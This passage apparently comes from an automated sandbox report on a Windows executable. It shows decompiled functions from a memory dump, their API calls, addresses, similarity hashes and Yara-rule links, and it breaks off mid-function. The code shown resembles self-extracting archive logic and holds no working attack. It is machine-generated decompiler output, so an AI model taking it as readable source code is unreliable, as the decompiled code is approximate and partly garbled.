Instruction Fuzzy Hash: 16E0ED71925318EBCB20EF99C505699B7F8EF04321F10C19FE84993601E7B1AE649BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00279B08, Relevance: 3.0, APIs: 2, Instructions: 22
comCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00279B08(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t7;
				void* _t11;
				intOrPtr _t14;

				 *[fs:0x0] = _t14;
				_t5 =  *0x2a75c0; // 0x75a776bc
				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E00291161, 0xffffffff);
				L0027D826(); // executed
				_t7 =  *0x29dff0( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t7;
			}

0x00279b19
0x00279b20
0x00279b2b
0x00279b31
0x00279b36
0x00279b3f
0x00279b4a

APIs

GdiplusShutdown.GDIPLUS(?,?,?,00291161,000000FF), ref: 00279B31
OleUninitialize.OLE32 ref: 00279B36

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: a93906cba34428fbb979b42eeb0f19739a15040ba46785b6aa274206ecf53883
Instruction ID: 6eb54f50a0c35acb21e4bde739de5627414be0edab06adc161cc3a5cfb1db11d
Opcode Fuzzy Hash: a93906cba34428fbb979b42eeb0f19739a15040ba46785b6aa274206ecf53883
Instruction Fuzzy Hash: F5E01A32958644AFC710DB48ED46B56B7E8FB09B20F00476AF91A83B50CB356810CA91

Uniqueness

Uniqueness Score: -1.00%

Function 00281726, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00281726(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E0028281A(__eflags, E0028166A); // executed
				 *0x29d680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E002828C8(__eflags, _t1, 0x2c01dc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00281759(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x0028172b
0x00281730
0x00281739
0x00281744
0x0028174a
0x0028174b
0x0028174d
0x00281758
0x0028174f
0x0028174f
0x00000000
0x0028174f
0x0028173b
0x0028173b
0x0028173d
0x0028173d

APIs

Part of subcall function 0028281A: try_get_function.LIBVCRUNTIME ref: 0028282F

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00281744
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0028174F

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 0ed74ed1ccd3897227ac5234a96757c743eb1c2d5aacf7fb39db5b8863969c51
Instruction ID: e7c65213c166983186a895aad53422446619bc41f11a8f4f03f0fd37fc84e067
Opcode Fuzzy Hash: 0ed74ed1ccd3897227ac5234a96757c743eb1c2d5aacf7fb39db5b8863969c51
Instruction Fuzzy Hash: 6DD0C97DAB7712989E043A74785299A974C99127707E45B5EF0208A4C2EB64803BBB25

Uniqueness

Uniqueness Score: -1.00%

Function 002612B2, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002612B2(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x002612b9
0x002612ce
0x002612d4

APIs

GetDlgItem.USER32(?,?), ref: 002612C7
ShowWindow.USER32(00000000), ref: 002612CE

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: e96bad9d1481e5cfd30c5fb7ea8d51157fd964a672be01ae49a7fae944d5cd83
Instruction ID: 056456bdf29e1d797baaa4e036abcdb595722fa85a922f28f486b2e4511bad3d
Opcode Fuzzy Hash: e96bad9d1481e5cfd30c5fb7ea8d51157fd964a672be01ae49a7fae944d5cd83
Instruction Fuzzy Hash: 18C01272058200BECB011BB0EC0ED2EBBA8ABA4312F04C90AF0AAC00A0C238C010EB21

Uniqueness

Uniqueness Score: -1.00%

Function 00261973, Relevance: 1.8, APIs: 1, Instructions: 285
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00261973(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _t106;
				intOrPtr _t109;
				signed int _t110;
				signed int _t112;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t138;
				intOrPtr _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				void* _t159;
				void* _t160;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t175;
				void* _t176;
				signed int _t178;
				char* _t190;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr* _t199;
				signed int _t202;
				void* _t204;
				char* _t205;
				intOrPtr _t206;
				void* _t207;

				_t197 = __edx;
				_t169 = __ecx;
				E0027D870(E00291451, _t207);
				_t199 = _t169;
				_push(7);
				_t164 = _t199 + 0x21f8;
				_push(_t199 + 0x21f8);
				 *((char*)(_t199 + 0x6cbc)) = 0;
				 *((char*)(_t199 + 0x6cc4)) = 0;
				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
					_t106 = E00261D09(_t164, 7);
					__eflags = _t106;
					if(_t106 == 0) {
						E00266ED7(_t207 - 0x38, 0x200000);
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
						_t197 =  *_t199;
						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
						_t175 = _t110;
						_t202 = 0;
						 *(_t207 - 0x14) = _t175;
						_t166 = 1;
						__eflags = _t175;
						if(_t175 <= 0) {
							L22:
							__eflags =  *(_t199 + 0x6cc0);
							_t176 = _t207 - 0x38;
							if( *(_t199 + 0x6cc0) != 0) {
								_t37 = _t207 - 4; // executed
								 *_t37 =  *(_t207 - 4) | 0xffffffff;
								__eflags =  *_t37;
								E0026159C(_t176); // executed
								L25:
								_t112 =  *(_t199 + 0x6cb0);
								__eflags = _t112 - 4;
								if(__eflags != 0) {
									__eflags = _t112 - 3;
									if(_t112 != 3) {
										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
										L32:
										 *((char*)(_t207 - 0xd)) = 0;
										__eflags = E0026391A(_t199, _t197);
										 *(_t207 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t116 =  *((intOrPtr*)(_t207 - 0xd));
											L39:
											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
											__eflags = _t178;
											if(_t178 == 0) {
												L41:
												__eflags =  *((char*)(_t199 + 0x6cc4));
												if( *((char*)(_t199 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t178;
													if(__eflags == 0) {
														E0026134C(__eflags, 0x1b, _t199 + 0x1e);
													}
													__eflags =  *((char*)(_t207 + 8));
													if( *((char*)(_t207 + 8)) != 0) {
														L48:
														__eflags =  *(_t207 - 0xe);
														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
														if( *(_t207 - 0xe) == 0) {
															L69:
															__eflags =  *((char*)(_t199 + 0x6cb5));
															if( *((char*)(_t199 + 0x6cb5)) == 0) {
																L71:
																E0026FAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
																L72:
																_t119 = _t166;
																goto L73;
															}
															__eflags =  *((char*)(_t199 + 0x6cb9));
															if( *((char*)(_t199 + 0x6cb9)) == 0) {
																goto L72;
															}
															goto L71;
														}
														__eflags =  *((char*)(_t199 + 0x21e0));
														if( *((char*)(_t199 + 0x21e0)) == 0) {
															L51:
															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
															while(1) {
																_t127 = E0026391A(_t199, _t197);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t199 + 0x6cb5));
																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
																			L66:
																			_t129 = 0;
																			__eflags = 0;
																			L67:
																			 *((char*)(_t199 + 0x6cb9)) = _t129;
																			L68:
																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
																			goto L69;
																		}
																		__eflags =  *((char*)(_t199 + 0x3318));
																		if( *((char*)(_t199 + 0x3318)) != 0) {
																			goto L66;
																		}
																		_t129 = _t166;
																		goto L67;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L68;
																	}
																	L60:
																	E00261E3B(_t199);
																	continue;
																}
																__eflags =  *((char*)(_t199 + 0x6cb5));
																if( *((char*)(_t199 + 0x6cb5)) == 0) {
																	L56:
																	_t138 = 0;
																	__eflags = 0;
																	L57:
																	 *((char*)(_t199 + 0x6cb9)) = _t138;
																	goto L60;
																}
																__eflags =  *((char*)(_t199 + 0x5668));
																if( *((char*)(_t199 + 0x5668)) != 0) {
																	goto L56;
																}
																_t138 = _t166;
																goto L57;
															}
															goto L68;
														}
														__eflags =  *((char*)(_t199 + 0x6cbc));
														if( *((char*)(_t199 + 0x6cbc)) != 0) {
															goto L69;
														}
														goto L51;
													} else {
														L46:
														_t119 = 0;
														L73:
														L74:
														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
														return _t119;
													}
												}
												__eflags = _t116;
												if(_t116 != 0) {
													goto L48;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t207 + 8));
											if( *((char*)(_t207 + 8)) == 0) {
												goto L46;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t207 - 0xd)) = 0;
										while(1) {
											E00261E3B(_t199);
											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
											__eflags = _t143 - _t166;
											if(_t143 == _t166) {
												break;
											}
											__eflags =  *((char*)(_t199 + 0x21e0));
											if( *((char*)(_t199 + 0x21e0)) == 0) {
												L37:
												_t144 = E0026391A(_t199, _t197);
												__eflags = _t144;
												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
												 *(_t207 - 0xe) = _t145;
												__eflags = _t145 - 1;
												if(_t145 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t143 - 4;
											if(_t143 == 4) {
												break;
											}
											goto L37;
										}
										_t116 = _t166;
										goto L39;
									}
									_t205 = _t199 + 0x21ff;
									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
									__eflags = _t147 - _t166;
									if(_t147 != _t166) {
										goto L46;
									}
									__eflags =  *_t205;
									if( *_t205 != 0) {
										goto L46;
									}
									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
									goto L32;
								}
								E0026134C(__eflags, 0x3c, _t199 + 0x1e);
								goto L46;
							}
							E0026159C(_t176);
							goto L46;
						} else {
							goto L6;
						}
						do {
							L6:
							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
							__eflags =  *_t190 - 0x52;
							if( *_t190 != 0x52) {
								goto L17;
							}
							_t152 = E00261D09(_t190, _t110 - _t202);
							__eflags = _t152;
							if(_t152 == 0) {
								L16:
								_t110 =  *(_t207 - 0x14);
								goto L17;
							}
							_t191 =  *((intOrPtr*)(_t207 - 0x18));
							 *(_t199 + 0x6cb0) = _t152;
							__eflags = _t152 - _t166;
							if(_t152 != _t166) {
								L19:
								_t197 =  *_t199;
								_t153 = _t202 + _t191;
								 *(_t199 + 0x6cc0) = _t153;
								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
								_t155 =  *(_t199 + 0x6cb0);
								__eflags = _t155 - 2;
								if(_t155 == 2) {
									L21:
									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
									goto L22;
								}
								__eflags = _t155 - 3;
								if(_t155 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t202;
							if(_t202 <= 0) {
								goto L19;
							}
							__eflags = _t191 - 0x1c;
							if(_t191 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t207 - 0x14) - 0x1f;
							if( *(_t207 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
							if( *((char*)(_t159 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
							if( *((char*)(_t159 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
							if( *((char*)(_t159 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
							if( *((char*)(_t159 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t202 = _t202 + 1;
							__eflags = _t202 - _t110;
						} while (_t202 < _t110);
						goto L22;
					}
					 *(_t199 + 0x6cb0) = _t106;
					_t166 = 1;
					__eflags = _t106 - 1;
					if(_t106 == 1) {
						_t206 =  *_t199;
						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
						asm("sbb edx, 0x0");
						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
					}
					goto L25;
				}
				_t119 = 0;
				goto L74;
			}

0x00261973
0x00261973
0x00261978
0x00261982
0x00261984
0x00261988
0x0026198e
0x0026198f
0x00261996
0x002619a3
0x002619ac
0x002619b7
0x002619bc
0x002619be
0x002619f4
0x002619fd
0x00261a01
0x00261a07
0x00261a12
0x00261a15
0x00261a1a
0x00261a1c
0x00261a1e
0x00261a21
0x00261a22
0x00261a24
0x00261ab9
0x00261ab9
0x00261ac0
0x00261ac3
0x00261acf
0x00261acf
0x00261acf
0x00261ad3
0x00261ad8
0x00261ad8
0x00261ade
0x00261ae1
0x00261af3
0x00261af6
0x00261b24
0x00261b2e
0x00261b32
0x00261b3a
0x00261b3f
0x00261b42
0x00261b44
0x00261b7d
0x00261b7d
0x00261b80
0x00261b80
0x00261b86
0x00261b88
0x00261b90
0x00261b90
0x00261b97
0x00261b9d
0x00261b9d
0x00261b9f
0x00261ba7
0x00261ba7
0x00261bac
0x00261bb0
0x00261bbd
0x00261bbd
0x00261bc7
0x00261bcd
0x00261cc5
0x00261cc5
0x00261ccc
0x00261cd7
0x00261ce7
0x00261cec
0x00261cec
0x00000000
0x00261cec
0x00261cce
0x00261cd5
0x00000000
0x00000000
0x00000000
0x00261cd5
0x00261bd3
0x00261bda
0x00261be9
0x00261bf0
0x00261bf2
0x00261bfb
0x00261c04
0x00261c0d
0x00261c16
0x00261c1f
0x00261c60
0x00261c62
0x00261c67
0x00261c69
0x00000000
0x00000000
0x00261c24
0x00261c2a
0x00261c2d
0x00261c4f
0x00261c52
0x00261c6d
0x00261c74
0x00261c83
0x00261c83
0x00261c83
0x00261c85
0x00261c85
0x00261c8b
0x00261c90
0x00261c99
0x00261ca2
0x00261cab
0x00261cb9
0x00261cc2
0x00000000
0x00261cc2
0x00261c76
0x00261c7d
0x00000000
0x00000000
0x00261c7f
0x00000000
0x00261c7f
0x00261c54
0x00261c57
0x00000000
0x00000000
0x00261c59
0x00261c5b
0x00000000
0x00261c5b
0x00261c2f
0x00261c36
0x00261c45
0x00261c45
0x00261c45
0x00261c47
0x00261c47
0x00000000
0x00261c47
0x00261c38
0x00261c3f
0x00000000
0x00000000
0x00261c41
0x00000000
0x00261c41
0x00000000
0x00261c6b
0x00261bdc
0x00261be3
0x00000000
0x00000000
0x00000000
0x00261bb2
0x00261bb2
0x00261bb2
0x00261cee
0x00261cef
0x00261cf4
0x00261cfe
0x00261cfe
0x00261bb0
0x00261b99
0x00261b9b
0x00000000
0x00000000
0x00000000
0x00261b9b
0x00261b8a
0x00261b8e
0x00000000
0x00000000
0x00000000
0x00261b8e
0x00261b46
0x00261b48
0x00261b4b
0x00261b4d
0x00261b52
0x00261b58
0x00261b5a
0x00000000
0x00000000
0x00261b5c
0x00261b63
0x00261b6a
0x00261b6c
0x00261b71
0x00261b73
0x00261b76
0x00261b79
0x00261b7b
0x00000000
0x00000000
0x00000000
0x00261b7b
0x00261b65
0x00261b68
0x00000000
0x00000000
0x00000000
0x00261b68
0x00261bb9
0x00000000
0x00261bb9
0x00261afa
0x00261b04
0x00261b07
0x00261b09
0x00000000
0x00000000
0x00261b0f
0x00261b12
0x00000000
0x00000000
0x00261b18
0x00000000
0x00261b18
0x00261ae9
0x00000000
0x00261ae9
0x00261ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x00261a2a
0x00261a2a
0x00261a2d
0x00261a2f
0x00261a32
0x00000000
0x00000000
0x00261a38
0x00261a3d
0x00261a3f
0x00261a7a
0x00261a7a
0x00000000
0x00261a7a
0x00261a41
0x00261a44
0x00261a4a
0x00261a4c
0x00261a84
0x00261a84
0x00261a86
0x00261a90
0x00261a96
0x00261a99
0x00261a9f
0x00261aa2
0x00261aa9
0x00261ab6
0x00000000
0x00261ab6
0x00261aa4
0x00261aa7
0x00000000
0x00000000
0x00000000
0x00261aa7
0x00261a4e
0x00261a50
0x00000000
0x00000000
0x00261a52
0x00261a55
0x00000000
0x00000000
0x00261a57
0x00261a5b
0x00000000
0x00000000
0x00261a60
0x00261a62
0x00261a66
0x00000000
0x00000000
0x00261a68
0x00261a6c
0x00000000
0x00000000
0x00261a6e
0x00261a72
0x00000000
0x00000000
0x00261a74
0x00261a78
0x00000000
0x00000000
0x00000000
0x00261a7d
0x00261a7d
0x00261a7e
0x00261a7e
0x00000000
0x00261a82
0x002619c2
0x002619c8
0x002619c9
0x002619cb
0x002619d1
0x002619d7
0x002619df
0x002619e4
0x002619e4
0x00000000
0x002619cb
0x002619a5
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00261978

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 923ccc81f9f6537a3aee292049610f4937b57e032021aee8761b5aad1f77d4fa
Instruction ID: fe19756b72202a412a9c60020c17830bc2eeb78dcec2c3859002c42c582e564b
Opcode Fuzzy Hash: 923ccc81f9f6537a3aee292049610f4937b57e032021aee8761b5aad1f77d4fa
Instruction Fuzzy Hash: 3BB1D170A20646AFEB18CFB4C484BB9FBA5BF15304F18425AE45593281DB71B9F4CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002681C4, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E002681C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				intOrPtr _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E0027D870(E002912D2, _t95);
				E0027D940();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E0026137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00269C0E(_t6, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E00261973(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E0026FAB1(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E0026B782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00266EF9(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E0026A1B1(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E0026835C(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E00270FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00261E4F(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E0026391A(_t34, _t89);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E002683C0(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00266E03(0x2a00e0, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E0026162D(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}

0x002681c4
0x002681c4
0x002681c4
0x002681c4
0x002681c9
0x002681d3
0x002681d9
0x002681db
0x002681e4
0x002681e9
0x002681f4
0x00268201
0x00268209
0x0026820f
0x00268216
0x00268229
0x00268230
0x00268237
0x0026823a
0x0026823c
0x00268242
0x00268249
0x00268250
0x00268257
0x0026825c
0x00268277
0x00268283
0x0026828a
0x0026828f
0x00268295
0x0026829a
0x0026829c
0x002682a3
0x002682aa
0x002682af
0x002682b1
0x00000000
0x00000000
0x00268264
0x0026826a
0x00268270
0x00268270
0x002682b3
0x002682b9
0x002682b9
0x002682bf
0x002682c8
0x002682cd
0x002682d2
0x002682d3
0x002682d4
0x002682dc
0x002682df
0x002682e6
0x002682e6
0x002682e1
0x002682e1
0x002682e4
0x00000000
0x00000000
0x002682e4
0x002682ed
0x002682f0
0x002682f7
0x002682f9
0x00268307
0x00268307
0x0026830e
0x0026830e
0x00268313
0x00268319
0x0026831e
0x0026831e
0x00268324
0x00268329
0x0026832e
0x00268337
0x0026833c
0x0026833c
0x0026831e
0x00268218
0x0026821f
0x0026821f
0x00268216
0x00268340
0x00268346
0x00268351
0x0026835b

APIs

__EH_prolog.LIBCMT ref: 002681C9

Part of subcall function 0026137D: __EH_prolog.LIBCMT ref: 00261382
Part of subcall function 0026137D: new.LIBCMT ref: 002613FA

Part of subcall function 00261973: __EH_prolog.LIBCMT ref: 00261978

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4f2829dbb58765d2b6292d758e9ed92e89aacbf884e128854b798cf1e7307f6e
Instruction ID: 06a024f578c804538805bbca79e815c39f85732435c0993336dd0caa53a6ea2d
Opcode Fuzzy Hash: 4f2829dbb58765d2b6292d758e9ed92e89aacbf884e128854b798cf1e7307f6e
Instruction Fuzzy Hash: 8241C3719206949ADB24EB60C855FEAB3B8AF50700F0400EAE58AA3152DF746FE8DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00272A7F, Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00272A7F(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E0027D870(E00291486, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E0027DB02(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E0027E920(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
